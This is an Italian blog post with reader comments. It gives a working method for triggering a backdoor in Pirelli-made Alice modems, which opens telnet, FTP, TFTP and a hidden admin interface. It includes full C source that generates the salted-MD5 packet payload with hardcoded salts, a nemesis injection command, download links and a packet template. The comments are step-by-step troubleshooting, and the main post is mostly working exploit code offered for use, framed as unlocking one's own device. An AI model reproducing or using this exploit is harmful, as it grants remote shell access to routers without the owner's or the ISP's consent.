Sbloccare i modem Alice senza cacciaviti, seriali o ponticelli

Posted on novembre 25th, 2008 di admin

Questo articolo è dedicato allo sblocco dei modelli AGA/AGB/AG2P-AG3/AGPV-AGPF dei modem Alice mediante backdoor.

se volete essere seguiti passo per passo o volete la soluzione pronta contattatemi via mail (la trovate nella Home) e cercherò di aiutarvi.

Io e drPepperOne abbiamo scoperto una backdoor nei modem Alice a base Broadcom che permette in un solo colpo da LAN di abilitare telnet, ftp, tftp e modalità web estesa. Ciò che molti non sanno è che nei modem c’è un vero e proprio Sistema Operativo e che telnet implementa in questi casi una vera e propria shell remota da cui controllare l’intero sistema. Inoltre le interfacce web estese (credo tutte) presentano una pagina per cambiare firmware senza troppe difficoltà

Per abilitare la backdoor è sufficiente inviare un pacchetto IP opportunamente formattato al modem su cui c’è un socket raw in ascolto.


Tale pacchetto deve avere le seguenti caratteristiche:
  • protocollo IP
  • Protocol Number 255
  • lunghezza 28 byte (8 byte di payload)
  • il payload è costituito dai primi 8 byte dell’md5 con salt del mac del device br0


in questi modelli di modem br0 ha lo stesso mac di eth0 ed è quindi facile da reperire. Esso si potrebbe anche ottenere dai mac di eth1 e wl0 che sono più o meno consecutivi a seconda dei modelli dei modem. Su AGA per esempio mac(eth1)=mac(eth0)+1 e mac(wl0)=mac(eth0)+4.

L’algoritmo di creazione del payload è il seguente:


Così com’è il programma prevede che venga passato come parametro un file di 6 byte contenente il mac di br0.Il file compilato su WinXP lo travate al seguente link:
saxdax & drPepperOne

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the paylod of the ip packet */
/* the mac must be in an hex file and has to be passed as argument to the program */

#include
#include
#include
#include “md5.h”

/*
* RFC 1321 compliant MD5 implementation
*
* Copyright (C) 2001-2003 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#define GET_UINT32(n,b,i) \
{ \
(n) = ( (uint32) (b)[(i) ] ) \
| ( (uint32) (b)[(i) + 1] << 8 ) \
| ( (uint32) (b)[(i) + 2] << 16 ) \
| ( (uint32) (b)[(i) + 3] << 24 ); \
}

#define PUT_UINT32(n,b,i) \
{ \
(b)[(i) ] = (uint8) ( (n) ); \
(b)[(i) + 1] = (uint8) ( (n) >> 8 ); \
(b)[(i) + 2] = (uint8) ( (n) >> 16 ); \
(b)[(i) + 3] = (uint8) ( (n) >> 24 ); \
}

void md5_starts( md5_context *ctx )
{
ctx->total[0] = 0;
ctx->total[1] = 0;

ctx->state[0] = 0×67452301;
ctx->state[1] = 0xEFCDAB89;
ctx->state[2] = 0×98BADCFE;
ctx->state[3] = 0×10325476;
}

void md5_process( md5_context *ctx, uint8 data[64] )
{
uint32 X[16], A, B, C, D;

GET_UINT32( X[0], data, 0 );
GET_UINT32( X[1], data, 4 );
GET_UINT32( X[2], data, 8 );
GET_UINT32( X[3], data, 12 );
GET_UINT32( X[4], data, 16 );
GET_UINT32( X[5], data, 20 );
GET_UINT32( X[6], data, 24 );
GET_UINT32( X[7], data, 28 );
GET_UINT32( X[8], data, 32 );
GET_UINT32( X[9], data, 36 );
GET_UINT32( X[10], data, 40 );
GET_UINT32( X[11], data, 44 );
GET_UINT32( X[12], data, 48 );
GET_UINT32( X[13], data, 52 );
GET_UINT32( X[14], data, 56 );
GET_UINT32( X[15], data, 60 );

#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 – n)))

#define P(a,b,c,d,k,s,t) \
{ \
a += F(b,c,d) + X[k] + t; a = S(a,s) + b; \
}

A = ctx->state[0];
B = ctx->state[1];
C = ctx->state[2];
D = ctx->state[3];

#define F(x,y,z) (z ^ (x & (y ^ z)))

P( A, B, C, D, 0, 7, 0xD76AA478 );
P( D, A, B, C, 1, 12, 0xE8C7B756 );
P( C, D, A, B, 2, 17, 0×242070DB );
P( B, C, D, A, 3, 22, 0xC1BDCEEE );
P( A, B, C, D, 4, 7, 0xF57C0FAF );
P( D, A, B, C, 5, 12, 0×4787C62A );
P( C, D, A, B, 6, 17, 0xA8304613 );
P( B, C, D, A, 7, 22, 0xFD469501 );
P( A, B, C, D, 8, 7, 0×698098D8 );
P( D, A, B, C, 9, 12, 0×8B44F7AF );
P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
P( B, C, D, A, 11, 22, 0×895CD7BE );
P( A, B, C, D, 12, 7, 0×6B901122 );
P( D, A, B, C, 13, 12, 0xFD987193 );
P( C, D, A, B, 14, 17, 0xA679438E );
P( B, C, D, A, 15, 22, 0×49B40821 );

#undef F

#define F(x,y,z) (y ^ (z & (x ^ y)))

P( A, B, C, D, 1, 5, 0xF61E2562 );
P( D, A, B, C, 6, 9, 0xC040B340 );
P( C, D, A, B, 11, 14, 0×265E5A51 );
P( B, C, D, A, 0, 20, 0xE9B6C7AA );
P( A, B, C, D, 5, 5, 0xD62F105D );
P( D, A, B, C, 10, 9, 0×02441453 );
P( C, D, A, B, 15, 14, 0xD8A1E681 );
P( B, C, D, A, 4, 20, 0xE7D3FBC8 );
P( A, B, C, D, 9, 5, 0×21E1CDE6 );
P( D, A, B, C, 14, 9, 0xC33707D6 );
P( C, D, A, B, 3, 14, 0xF4D50D87 );
P( B, C, D, A, 8, 20, 0×455A14ED );
P( A, B, C, D, 13, 5, 0xA9E3E905 );
P( D, A, B, C, 2, 9, 0xFCEFA3F8 );
P( C, D, A, B, 7, 14, 0×676F02D9 );
P( B, C, D, A, 12, 20, 0×8D2A4C8A );

#undef F

#define F(x,y,z) (x ^ y ^ z)

P( A, B, C, D, 5, 4, 0xFFFA3942 );
P( D, A, B, C, 8, 11, 0×8771F681 );
P( C, D, A, B, 11, 16, 0×6D9D6122 );
P( B, C, D, A, 14, 23, 0xFDE5380C );
P( A, B, C, D, 1, 4, 0xA4BEEA44 );
P( D, A, B, C, 4, 11, 0×4BDECFA9 );
P( C, D, A, B, 7, 16, 0xF6BB4B60 );
P( B, C, D, A, 10, 23, 0xBEBFBC70 );
P( A, B, C, D, 13, 4, 0×289B7EC6 );
P( D, A, B, C, 0, 11, 0xEAA127FA );
P( C, D, A, B, 3, 16, 0xD4EF3085 );
P( B, C, D, A, 6, 23, 0×04881D05 );
P( A, B, C, D, 9, 4, 0xD9D4D039 );
P( D, A, B, C, 12, 11, 0xE6DB99E5 );
P( C, D, A, B, 15, 16, 0×1FA27CF8 );
P( B, C, D, A, 2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

P( A, B, C, D, 0, 6, 0xF4292244 );
P( D, A, B, C, 7, 10, 0×432AFF97 );
P( C, D, A, B, 14, 15, 0xAB9423A7 );
P( B, C, D, A, 5, 21, 0xFC93A039 );
P( A, B, C, D, 12, 6, 0×655B59C3 );
P( D, A, B, C, 3, 10, 0×8F0CCC92 );
P( C, D, A, B, 10, 15, 0xFFEFF47D );
P( B, C, D, A, 1, 21, 0×85845DD1 );
P( A, B, C, D, 8, 6, 0×6FA87E4F );
P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
P( C, D, A, B, 6, 15, 0xA3014314 );
P( B, C, D, A, 13, 21, 0×4E0811A1 );
P( A, B, C, D, 4, 6, 0xF7537E82 );
P( D, A, B, C, 11, 10, 0xBD3AF235 );
P( C, D, A, B, 2, 15, 0×2AD7D2BB );
P( B, C, D, A, 9, 21, 0xEB86D391 );

#undef F

ctx->state[0] += A;
ctx->state[1] += B;
ctx->state[2] += C;
ctx->state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
uint32 left, fill;

if( ! length ) return;

left = ctx->total[0] & 0×3F;
fill = 64 – left;

ctx->total[0] += length;
ctx->total[0] &= 0xFFFFFFFF;

if( ctx->total[0] < length )
ctx->total[1]++;

if( left && length >= fill )
{
memcpy( (void *) (ctx->buffer + left),
(void *) input, fill );
md5_process( ctx, ctx->buffer );
length -= fill;
input += fill;
left = 0;
}

while( length >= 64 )
{
md5_process( ctx, input );
length -= 64;
input += 64;
}

if( length )
{
memcpy( (void *) (ctx->buffer + left),
(void *) input, length );
}
}

static uint8 md5_padding[64] =
{
0×80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
uint32 last, padn;
uint32 high, low;
uint8 msglen[8];

high = ( ctx->total[0] >> 29 )
| ( ctx->total[1] << 3 );
low = ( ctx->total[0] << 3 );

PUT_UINT32( low, msglen, 0 );
PUT_UINT32( high, msglen, 4 );

//for(int i=0;i<8;i++) printf(”length %d\n”,msglen[i]);

last = ctx->total[0] & 0×3F;
padn = ( last < 56 ) ? ( 56 – last ) : ( 120 – last );

md5_update( ctx, md5_padding, padn );
md5_update( ctx, msglen, 8 );

PUT_UINT32( ctx->state[0], digest, 0 );
PUT_UINT32( ctx->state[1], digest, 4 );
PUT_UINT32( ctx->state[2], digest, 8 );
PUT_UINT32( ctx->state[3], digest, 12 );
}

//#ifdef TEST

/*
* those are the standard RFC 1321 test vectors
*/

static char *msg[] =
{
“”,
“a”,
“abc”,
“message digest”,
“abcdefghijklmnopqrstuvwxyz”,
“ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789″,
“12345678901234567890123456789012345678901234567890123456789012″ \
“345678901234567890″
};

static char *val[] =
{
“d41d8cd98f00b204e9800998ecf8427e”,
“0cc175b9c0f1b6a831c399e269772661″,
“900150983cd24fb0d6963f7d28e17f72″,
“f96b697d7cb7938d525a2f31aaf161d0″,
“c3fcd3d76192e4007dfb496cca67e13b”,
“d174ab98d277d9f5a5611c2c9f419d9f”,
“57edf4a22be3c955ac49da2e2107b67a”
};

//Salt per AGA/AGB/AG3(Vela)
static char saltOrig[] =
{0×04, 0×07, 0×67, 0×10, 0×02, 0×81, 0xFA, 0×66, 0×11, 0×41, 0×68, 0×11, 0×17, 0×01, 0×05, 0×22, 0×71, 0×04, 0×10, 0×33};
//Salt per AGPV/AGPF
//static char saltOrig[] =
//{0×43, 0×22, 0×11, 0×11, 0×22, 0×81, 0xFA, 0×65, 0×11, 0×41, 0×54, 0×11, 0×17, 0×12, 0×15, 0×22, 0×72, 0×03, 0×10, 0×66};

int main( int argc, char *argv[] )
{
FILE *f;
int i, j;
char output[33];
md5_context ctx;
unsigned char buf[1000];
unsigned char md5sum[16];
unsigned char salt[20];

printf( “****************************\n”);
printf( “Alice BackDoor hash creator \n”);
printf( “by saxdax and drPepperOne \n”);
printf( “****************************\n\n”);

if( argc < 2 )
{
printf( “\n Usage: %s pathfileMAC\n\n”, argv[0] );
return 0;
}

if( ! ( f = fopen( argv[1], “rb” ) ) )
{
perror( “fopen” );
return( 1 );
}

md5_starts( &ctx );

while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 )
{
md5_update( &ctx, buf, i );
}

memcpy(salt, saltOrig, 20);

md5_update( &ctx, salt, 20 );

md5_finish( &ctx, md5sum );

printf(”Payload is: “);
for( j = 0; j < 8; j++ )
{
printf( “%02x”, md5sum[j] );
}

return( 0 );
}

 

AGA/AGB/AG3 http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html
AGPV/AGPF http://rapidshare.com/files/156053651/md5_AGPV_AGPF.exe.html

Tali programmi sono validi fino alle seguenti versioni di firmware:

AG2P: 3.1.0
AG3: 3.2.4
AGA: 3.2.4
AGB: 3.2.4
AGPF: AGPF_4.3.4.0001 (e la 4.4.0)
AGPV: 4.3.1

Il programma deve essere lanciato da linea di comando e restituisce a video gli 8 byte del payload.

A questo punto potete utilizzare qualsiasi strumento di injection preferiate.

Io ho utilizzato Colasoft Packet Builder, generatore visuale con GUI su Windows.

Allego il template di un pacchetto già pronto in cui cambiare solo IP del modem e del pc, mac del modem e del pc e payload (nalla parte in basso a sinistra esadecimale di colasoft PB):

http://www.megaupload.com/?d=8OH6NFX1

posizione payload

posizione payload

drPepperOne ha utilizzato Nemesis da linea di comando, disponibile per Linux e Windows.

Una volta creato un file di 8 byte con un editor esadecimale, con nome per es. hash.hex, la sintassi da usare con Nemesys è:

Code: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex

Se il pacchetto è corretto il router risponderà con un pacchetto ICMP con codici 3 e 2 (protocol unreachable).

A questo punto potete collegarvi a telnet, ftp e tftp ed utilizzare l’interfaccia web estesa senza aver aperto il modem!

Buon divertimento.

Tags: modem Alice // 57 Comments »

57 Responses to “Sbloccare i modem Alice senza cacciaviti, seriali o ponticelli”

  1. luca da vr // mar 4, 2009 at 03:47

    Ciao ho seguito al passo la tua guida..mi dice IP Packet Injected ma se eseguo telnet 192.168.1.1 mi dice:
    Trying 192.168.1.1…
    telnet: Unable to connect to remote host: Connection refused

    Cosa ho sbagliato???inoltre non riesco a capire come farei ad avere un payload di 8 byte…ho guardato sulle propriet’ del file e segna 16B…
    Aspetto un vostro aiuto…!
    Grazie mille!!!

  2. admin // mar 4, 2009 at 14:32

    evidentemente hai usato un editor di testo anzichè un editor esadecimale.
    il file con il mac dev’essere di 6 byte e il file con il payload di 8 byte.

  3. pertecara // apr 9, 2009 at 11:31

    Ciao e un ringraziamento anticipato per il tuo ottimo lavoro.

    Ti allego il testo di un mio messaggio immesso nel Forum de ilpuntotecnicoeadsl.com al quale purtroppo non è seguita una risposta.
    Spero tu possa aiutarmi.

    Ho un AGA al quale ho sostituito il firmware originale con quello chiamato AGW2-PLUS_flash_image_8MB.w (Pirelli)
    La procedura non ha avuto particolari problemi.
    Una volta messe in corto le due famose piazzole segnate in rosso, ho riacceso il router, il led del Power s’è acceso in rosso ecc. ecc.

    Dopo qualche giorno di prove, mi sono deciso a sostiture il firmware con quello chiamato USRAGW2-PLUS_fs_kernel_3.04L.01.-090315_1900, penso più adatto alle mie esigenze (non ho Alice Flat) cercando di passare prima da AGW2-PLUS_psi_clear.

    Ma qui mi sono bloccato.

    Ho provato e riprovato non meno di 100 volte a ripetere la procedura del ponticello sulle due famose piazzole ma…

    Niente da fare!
    Ho provato anche a saldarci due fili in rame per essere sicuro di aver fatto il corto…

    Il led power si accende sempre regolarmente in verde e il router si avvia normalmente e me lo ritrovo come sempre all’indirizzo 192.168.1.1 (o 192.168.1.1/main.html se voglio andare nel menu Pirelli).

    Alla fine non sapendo cosa fare, e non trovando altra via, sono andato nella pagina di aggiornamento del firmware Pirelli per fare l’upload di AGW2-PLUS_psi_clear.

    Appena terminato l’upload il router s’è riavviato come previsto ma adesso è irraggiungibile dal consueto indirizzo e come sempre non riesco a riavviarlo con la procedura del ponticello.

    Ho successivamente provato questa tua procedura ma non succede niente e il router resta irraggiungibile sia in Telnet che in http.
    Penso che tutto dipenda dal psi_clear che ha piallato tutto nella flash…

    Che faccio adesso?

    Devo ricorrere alla JTAG?
    Semmai quale tipo?
    Quella semplice che ha le sole resistenze è sufficiente?
    Eventualmente lo schema di connessione verso l’interfaccia a 14 pin nella piastra dell’AGA?
    Ti descrivo il tipo del mio Alice Gate voip 2 Plus Wi-Fi:
    la flash montata è la MX29LV640DTTC-90G
    L’etichetta hardware dice: IO1L011 REV. 3 GP

    Grazie infinite per l’aiuto.

  4. admin // apr 9, 2009 at 11:45

    Ciao Pertecara,

    il mio metodo si applica solo ai firmware Pirelli. Non funziona se intanto lo hai sovrascritto con uno USRobotics.
    Nel tuo caso credo proprio che l’unico metodo per sperare di recuperare il modem sia tramite JTAG.
    Non sono ancora esperto di JTAG e seriali (motivo per cui cerco tutti i modi possibili di sbloccare i modem via software) e quindi ti rimando agli esperti sul forum da te indicato.

    Buona fortuna

  5. Tuttokekko // mag 14, 2009 at 22:21

    Grandissimo tutorial
    Non ho ancora provato la procedura perchè ho una domanda.
    E’ possibile tornare indietro e riportare lo stato come da mamma Telecom dato che mi hanno detto che se per caso lo devo sostituire se è manomesso me lo fanno ripagare?
    Grazie.

  6. Tuttokekko // mag 14, 2009 at 23:23

    Scusa. Sempre io.
    Ma con i firmware attuali funziona ancora?
    Io ho l’AGPF_4.3.5 e facendo la procedura non succede assolutamente nulla.
    I file sono creati alla perfezione, il comando nemesis mi da la conferma, ma nulla cambia.
    Ciao e grazie anticipatamente.

  7. admin // mag 14, 2009 at 23:48

    @Tuttokekko

    lo sblocco con questo metodo permette di ottenere l’accesso ad una sezione nascosta già presente nel firmware originale. Equivale a modificare solo due righe del file di configurazione.

    Si può tornare indietro in due modi.
    1) Reimpostando opportunamente il file di configurazione.
    2) resettando via hardware il modem (per l’agpf basta tenere premuto 20 secondi durante l’accensione il tasto di reset)

    Per quanto riguarda la seconda domanda, il codice pubblicato per AGPF funziona finon alla versione 4.3.3 (e anche per 4.4.0). Per le 4.3.4 e 4.3.5 cambia il payload. NOn ho pubblicato il codice per questi ultimi anche se esiste.

    Ciao

  8. Francesco // mag 20, 2009 at 16:35

    Complimenti per la guida, ma nel mio caso non pare funzionare. Sicuramente sbaglio qualcosa, dal momento che non sono espertissimo.
    Il mio è un Alice Gate 2 Plus (non wifi), l’etichetta sotto dice Alice Business Gate 2 Plus, e dalla pagina principale del router leggo che ha software AGB_3.2.4.
    Seguita la procedura, creato il file del MAC address con un editor hex (6 byte), copiato il risultato del software del primo link in un nuovo file hex da 8 byte. Inviato il pacchetto con nemesis, ottengo “IP packet injected”, e pare non essere cambiato nulla.
    Premetto che subito dopo ho provato ad entrare in ftp semplicemente digitando in IE8 (ma anche Chrome) ftp://192.168.1.1. Scusate l’ignoranza, non so se questo è sufficiente.

    Idee? Consigli? Insulti?

  9. Francesco // mag 20, 2009 at 16:38

    Una precisazione: il MAC address che ho inserito nel file hex di 6 byte è quello che trovo sull’etichetta posta sotto il router. Se non ho capito male è quello da inserire… o no?

  10. admin // mag 21, 2009 at 00:24

    Ciao Francesco,

    il mac è quello stampato sotto il modem.
    La procedura sembra corretta.
    E’ importantissimo killare momentaneamente qualsiasi firewall o antivirus installati sul pc.
    E’ importante eseguire la procedura via cavo; l’invio di pacchetti (injection) in wifi è un po’ più delicato.
    Per conferma sulla correttezza del payload mandami il mac per email.
    In alternativa prova con Colasoft Packet Builder.

    Ciao

  11. admin // mag 22, 2009 at 22:27

    Giusto per rispondere, Franceso ha risolto usando Colasoft Packet Builder.

    Ciao

  12. Fabry // mag 31, 2009 at 14:45

    Poichè nemesis non funziona a causa di problemi con la packet.dll potresti spiegarmi come utilizzare il payload con Colasoft Packet Builder? Grazie!

  13. admin // mag 31, 2009 at 18:28

    il payload di 8 byte va scritto nella parte sinistra in basso di colasoft Packet Builder. Per intenderci la parte esadecimale e non testuale.
    Per verificare la correttezza dell’operazione alla fine dovresti trovarti una dimensione di 28 byte.

  14. Fabry // giu 2, 2009 at 11:51

    Scusa se ti riscrivo… potresti mandarmi un esempio, anche per posta, di come creare il pacchetto ip da inviare? Purtroppo qualunque tipo di pacchetto io crea e per come lo modifico non riesco ad ottenere i 28byte.
    Oltretutto anche risolvendo i problemi di dll con nemesis ottengo il seguente messaggio di errore: “Unable to retrieve the list of the adapters!
    failed to select device
    ERROR: Unable to open raw socket for packet injection: .
    You may need Administrator privileges to use nemesis.

    IP Injection Failure”

    Grazie.

  15. admin // giu 2, 2009 at 15:11

    ti ho mandato un template del pacchetto da inviare con colasoft PB in cui cambiare solo i dati necessari: IP tuo e del modem, mac tuo e del modem, payload.

    Ciao

  16. Fabry // giu 2, 2009 at 17:15

    Sei un grande!!! Grazie infinite!!!

  17. fabio // giu 2, 2009 at 18:37

    printf( “****************************\n”);
    printf( “Alice BackDoor hash creator \n”);
    printf( “by saxdax and drPepperOne \n”);
    printf( “****************************\n\n”);

    if( argc < 2 )
    {
    printf( “\n Usage: %s pathfileMAC\n\n”, argv[0] );
    return 0;
    }

    A ME CAPITA QUESTO, CIOè RICHEDE IL PATHFILEMAC MA NN SO COSA SIA, PENSAVO FOSSE L’INDIRIZZO MAC, MA MI DA ERRORE…

  18. admin // giu 2, 2009 at 23:57

    @fabio

    quello che viene richiesto è il percorso completo di nome (path appunto) in cui si trova il file di 6 byte contenente il mac (creato con editor esadecimale).

  19. fabio // giu 3, 2009 at 12:14

    sn in windows, collego il router (firmware 4.3.2) a power, lan e adsl, accendo il router, scrivo il file esadecimale del mac address e creo il payload con la backdoor scaricata; poi prendo il payload e lo riscrivo sottoforma esadecimale, il risultato lo copio nella parte in basso a sinistra del programma colasoft;(per poter sciverlo in basso a sinistra, premo in colasoft ADD- IP PACKET, cancello quello che c’era scritto e metto il mio payload); ovviamente sorgente e destinatario non sono ne il mio pc ne il router, credo sia normale, comunque ovviamente premo SENT e quando invio non succede proprio nulla, neanke un messaggio, niente di niente….ho sbagliato qualksa vero?

  20. fabio // giu 4, 2009 at 11:15

    il metodo della “wiki” non ha dato i frutti sperati, adesso riprovo il tuo (PERO’ SE QUALKUNO HA GIA RICEVUTO DA SAXDAX UN TEMPLATE DEL PACCHETTO DA INVIARE CON COLASOFT ME LO INVII [TIPO FABRY...] ). se non iresco a sbloccarlo ancora, allora proverò a ponticellare §_§

    Fatemi sapere e vi farò sapere ^_^

  21. admin // giu 4, 2009 at 22:32

    nell’articolo ho aggiunto il template di un pacchetto già pronto per Colasoft Packet Builder.

    Ora non potete più sbagliare :)

  22. fabio // giu 7, 2009 at 08:37

    niente…devo provare per forza a ponticellare.
    Il template era giusto e l’ho mandato piu e piu volte (ho killato sia avast ke firewall di windows). Ho provato ad entrare in telnet ma niente.
    A e devo anche dire che il metodo della wiki nn ha dato i suoi frutti

    Secondo me è il mio tipo di modem ke nn va bene perchè è il tipo business oppure perchè ho l’agpf 4.3.2
    a ma mika dovevo installare il cd di alice prima….=)….sn proprio disperato

  23. andry // giu 24, 2009 at 17:47

    Ciao! Ma questa guida serve principalmente ad avere accesso telnet? L’interfaccia web estesa dopo la procedura in che pagina si troverà? L’accesso telnet serve principalmente per modificare i valori snr? Se si utilizza questa procedura bisogna disattivare la Telegestione? come?

    Grazie in anticipo :)

  24. ioenopio // giu 28, 2009 at 13:12

    ciao saxdax,
    ho trovato in un sito un eseguibile ch sembri automatizzare tutte le tue procedure.io non l’ho provato per precauzione, ma a te risulta che funzioni?
    http://www.evilsocket.net/sources/alicefuck.sh.txt

    grazie

  25. admin // giu 28, 2009 at 17:44

    @ioenopio

    quella è la traduzione in script bash del mio algoritmo. Funziona su linux a patto di avere installato nemesis e qualcos’altro.

    Ci sono tuttavia anche degli eseguibili per linux ancora più compatti sul thread dedicato alla mia procedura di sblocco su http://www.ilpuntotecnicoeadsl.com.

    Ciao

  26. c4nc // lug 22, 2009 at 16:58

    Ciao a tutti, avendo un router alice gate 2 plus wifi con software AGIA_1.2.0, la procedura descritta funziona? o il payload che viene generato non vale per questo firmware? Ho provato in tutti i modi la procedura (sia linx che windows) ma senza alcun risultato…..

  27. admin // lug 22, 2009 at 17:06

    @c4nc

    no. la procedura funziona solo sui modem Pirelli Alice elencati nell’articolo.
    L’AGIA è delle Industrie Dialface.

    Ci sono altri metodi di sblocco per questo.

    Vedi su http://www.ilpuntotecnicoeadsl.com/forum per maggiori info

    Ciao

  28. alex77 // ago 5, 2009 at 15:41

    Ho testato su un vecchio modem alice gate 2 wifi plus del 2005 e funziona alla perfezione (sotto linux ho usato come editor esadecimale Ghex2 e nemesis per fare l’injection del pacchetto IP). Oltre all’accesso via web alle funzionalità estese (http://192.168.1.1/main.html) e tramite telnet mi piacerebbe far funzionare l’ssh ma anche se risulta abilitato non funziona. Anche il forward delle richieste dns non va. Il firmware esistente non mi pare un granché. A questo punto ha senso caricarci tramite la funzionalità di upload da interfaccia gui un firmware più recente di quelli supportati da questa procedura e se si, dove potrei reperirlo? Grazie intanto per lo splendido lavoro che mi ha consentito di risparmiare i soldi di un nuovo modem essendo passato a infostrada dopo l’iniziativa truffa di telecom (http://notinmylivingroom.blogspot.com)
    ciao!

  29. Rytx // ago 9, 2009 at 22:52

    Ciao, ho letto il tuo topic e mi sono incuriosito. PRima di tutto voglio farvi i complimenti.

    Volevo sapere se il metodo elencato può funzionare con AGPF_4.3.5a ? Preservo le funzioni dell’Alice TV (digitale terreste e televisione via cavo) ? Rimangono le funzioni del VOIP ?

    Ogni qual volta che la telecom fa un aggiornamento del firmware devo rifare tutta la procedura?

    Sono intresssato solo perchè voglio configurare il gateway del router. Grazie mille aspetto una risposta ^^

  30. admin // ago 9, 2009 at 23:50

    @alex77

    sono contento di esserti stato utile. Per le opzioni possibili su questi modem ti rimando al forum http://www.ilpuntotecnicoeadsl.com/forum.
    Troverai tanti spunti interessanti.

    @Rytx
    Per quanto riguarda l’AGPF 4.3.5a non ho ancora avuto modo di testare. Comunque già per il 4.3.5 il tool di creazione del payload non è pubblicato (anche se esiste).
    Ti farò sapere.
    Per quanto riguarda le funzionalità telecom, il metodo in questione non è per niente invasivo e mantiene tutte le funzionalità del gestore.

    A presto

  31. Rytx // ago 10, 2009 at 20:57

    Ciao grazie della risposta celere, sai per caso se esiste un modo per tornare al firmware precedente per poter applicare lo “sblocco” ?

    grazie

  32. admin // ago 10, 2009 at 23:16

    se per “tornare al firmware precedente” intendi disattivare gli effetti dello sblocco, allora devi selezionare il “restore default settings” da interfaccia avanzata o da telnet.

    Ciao

  33. spino // ago 20, 2009 at 01:26

    ciao, complimenti per l’ottima guida!!
    Potresti, quando avrai tempo, pubblicare le specifiche per il firmware del pirelli wi-fi AGPF_4.3.5a?
    Con la versione AGPF_4.3.5 era possibile entrare nel SO del router, adesso non c’è versi.
    Te ne sarei (saremo, visto che il firmware si aggiorna automaticamente e molti sono nella mia condizione) grato.

    Ultima domanda: siccome il pirelli aggiorna il firmware in automatico, c’è modo di bloccare questo processo?

    Grazie ancora

    Spino

  34. Xenon87 // ago 30, 2009 at 20:10

    Salve, avrei bisogno del template per il pacchetto per Colasoft Packet Builder, ma il link non va perché il sito dice che è stato raggiunto il limite dei download per quel file.

    Qualcuno potrebbe gentilmente creare un link per megaupload o inviarmi quel template per favore?

    Grazie e arrivederci!

  35. mavelot // set 17, 2009 at 11:21

    Ciao,
    mi potresti chiarire “Per quanto riguarda l’AGPF 4.3.5a non ho ancora avuto modo di testare. Comunque già per il 4.3.5 il tool di creazione del payload non è pubblicato (anche se esiste).”

    In che senso non è pubblicato…da chi ??
    Cerchiamo di darci una mano per “procurarcelo” !
    Ciao,
    Marco

  36. admin // set 17, 2009 at 12:06

    Ciao mavelot,

    ovviamente IO non ho pubblicato per motivi già esposti. Ci sarebbe una corsa continua tra me e gli sviluppatori telecom/pirelli che non mi va di cominciare.

    Ciao

  37. mavelot // set 17, 2009 at 14:05

    Ciao,
    ti ringrazio per la sollecita risposta.

    Peccato che non ho le necessarie conoscenze per fare il reverse engeenering che hai fatto tu….
    Spero solo che quando proverò i firmware successivi, si riesca almeno ad abilitare il tutto da console…anche se non è escluso che abbiano inibilto anche quella
    Ciao

  38. winder65 // set 19, 2009 at 09:44

    ciao, a me quando uso nemesis mi spunta come errore questa scritta “impossibile trovare il punto di ingresso PacketGetNetInfo della procedura nella libreria di collegamento dinamico packet.dll
    ti ringrazio anticipatamente fammi sapere ciao.

  39. mauzza // set 23, 2009 at 20:39

    Ciao a tutti, qualcuno che ha scaricato il template per Colasoft potrebbe x favore renderlo disponibile (il link su rapidshare da errore) e non sono certo di aver fatto tutto bene nella costruzione del pacchetto … infatti non funziona.
    Ho AGPF_4.5.0 e sto usando algoritmo di creazione payload che mi sembra generico (per tutti le versioni di firmware ??) infati genera payload diverso da quello linkato in discussione. Grazie ciao

  40. mauzza // set 24, 2009 at 00:00

    ciao, trascurate la richiesta precedente. Ho trovato il template in altro forum e ho capito che la causa del non funzionamento è la versione del fw grazie

  41. alix // set 24, 2009 at 09:52

    potresti dire su che forum o incollare un link al template per favore.. ? grazie

  42. mauzza // set 24, 2009 at 19:45

    il template si può trovare su forum legati allo sblocco delle del modem/router su http://www.ilpuntotecnicoeadsl.com.
    mini guida a Colasoft visto che ho fatto diverse prove:
    1) add packet
    2) scegliere tipo IP
    3) cambiare i valori:
    Destination address: MAC modem (separati da :)
    Source address: MAC scheda rete (separato da :)
    Total Lenght: impostare 28
    Protocol: 255
    Source IP: IP scheda rete
    Destination IP: IP modem
    Number of Bytes: selezionare la voce e nell’editor hex cancellare i vaolri e inseire gli 8byte del payload
    4) selezionare il pacchetto con click dx Send
    spero di esserti stato d’aiuto, ciao

  43. Lucchino // ott 8, 2009 at 22:11

    Ciao ragazzi ho appena seguito la procedura a puntino tentando di sbloccare ALICE GATE VoIP 2 Plus Wifi con firmare versione 4.3.5a.Faccio tutto con windows:Creo il file da 8Byte(contenente il payload) con un editor esadecimale.Poi da linux inietto il pacchetto nel router tramite nemesis.
    Alla fine della procedura mi dice “IP PACKET INJECTED”, quindi tutto sembra essere andato a buon fine,ma in realtà nel router non si è attivato il menu avanzato segreto…
    Avete qualche consiglio?
    Cosa ho sbagliato secondo voi?
    Qualcuno può aiutarmi?Grazie mille

  44. admin // ott 8, 2009 at 22:35

    semplicemente non hai letto la parte in cui dico:

    “Tali programmi sono validi fino alle seguenti versioni di firmware:” etc etc.

